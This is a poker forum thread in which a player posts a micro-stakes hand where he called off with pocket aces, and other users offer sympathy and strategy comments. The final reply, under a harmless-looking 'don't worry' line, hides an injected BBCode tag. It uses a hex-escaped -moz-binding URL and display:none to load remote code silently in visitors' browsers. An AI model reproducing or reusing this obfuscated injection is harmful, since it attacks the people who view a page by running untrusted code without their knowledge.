Most stupid person, me?

• snowylee
      snowylee
      Bronze
      Known players: (for a description of vp$ip, pfr, ats, folded bb, af, wts, wsd or hands click here)
      BB:
      $4,35
      MP1:
      $8,11
      CO:
      $3,91
      BU:
      $2,56
      SB:
      $5,01
      Hero:
      $5,50
      UTG+2:
      $4,24
      MP3:
      $1,96

0,02/0,04 No-Limit Hold'em (8 handed)
      Hand recorder used for this poker hand: Texas Grabem 1.7 by www.pokerstrategy.cc.

Preflop: Hero is MP2 with A:spade: , A:heart:
      2 folds, Hero raises to $0,16, MP3 folds, CO calls $0,16, 3 folds.

Flop: ($0,38) K:diamond: , 5:club: , 3:spade: (2 players)
      Hero bets $0,20, CO calls $0,20.

Turn: ($0,78) K:club: (2 players)
      Hero bets $0,50, CO raises to $1,50, Hero calls $1,00.

River: ($3,78) T:club: (2 players)
      Hero bets $1, CO raises to $2,05 (All-In), Hero calls $1,05.

Final Pot: $7,88

I really must be the most stupid person ever born since I called his turnraise and even made a god damn bet and then call on the river EVEN THOUGH I figured he had a King..... Somebody please shoot me and put me out of my misery :/... Its laughable.. It really is *sigh*
  • 9 replies
    • Puschkin81
      Puschkin81
      Bronze
      Hi snowylee!

Bet/fold turn :D

Don't worry: I've seen a lot of worse moves than this one. I think you learned from this one, which is good!

Good luck at the tables!
      Puschkin81
    • snowylee
      snowylee
      Bronze
      Yeah well as I said, I was like 98% sure of that he had trip Kings after his turnmove, and the voice in my head screamed at me "wtf are you doing you moron?! FOOOOLD!" kinda... And you dont wanna know what the voice screamed at me at the river rofl. Seriously though, I dont know why but sometimes its like the brain explodes :P , Ive done stupid shit like this before, when everything screams "foooold" and I still do shit like this hehe.. But ok, never THIS bad before :P . So frustrating because I really knew when playing this hand that its WRONG, so WRONG.. :) .

Its nice you guys have a downswing report forum lol, but I guess this qualifies more like a "bad beat" then downswing as a whole hehe.. But I AM in a downswing anyway so.. Its hard to crawl up from it too when you havent had the time to play some serious poker the last weeks either :( .
    • Puschkin81
      Puschkin81
      Bronze
      Maybe it helps you a bit if you read this article:

"Patience and long-term thinking"

Good luck at the tables!
      Puschkin81
    • snowylee
      snowylee
      Bronze
      Yeah I know, and I really am a patient person, i dont get angry when I lose hands usually either, except in cases like this when its so blatant where the error is, in the chair in front of the monitor lol :) . I didnt get mad or upset when I lost 2 stacks with KK vs AA or when I lost a stack with AK a bit badly. Ok it changes with the state of mind Im in, but usually it doesnt effect me all that much, or any at all, I just calmly thing about if I made a blatant mistake somewhere in the hand etc. But oh well... I just lost it lol :P . Going to work even more on my selfmanagement skills ^^
    • ciRith
      ciRith
      Bronze
      Hmm I know these situation(s?) as well. Isn't it possible that he raises the turn as a semibluff with a flushdraw? Maybe even with a 5 or pp between 66-QQ.
    • mchaggis
      mchaggis
      Bronze
      Originally posted by ciRith
      Hmm I know these situation(s?) as well. Isn't it possible that he raises the turn as a semibluff with a flushdraw? Maybe even with a 5 or pp between 66-QQ.
      That's NL5 :rolleyes:
    • snowylee
      snowylee
      Bronze
      Well the FD is a possibility I suppose, maybe 66-QQ too, but I dont think the 5 is a possibility, at least not vs this guy.
    • CRI4BRA
      CRI4BRA
      Bronze
      Hi Snowy,

I have to thank you from the bottom of my heart for this post.

I lost 3 times 2$ = 6$ on ppl with AA against my JJ OR QQ following too blindly SSS which IMO is far from being an ok strategy, but that's another bag with cats....

I thank you because the post made me laugh like I haven't in a long time and swept away all the bitternesss of playing SSS on NL10.

I've been in the same situation like you, making same moves like you ( and I still make them :( ..... ) and I do understant perfectly what you're saying.

Cristian
    • Muggs
      Muggs
      Bronze
      Dont worry its normal situation :) http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]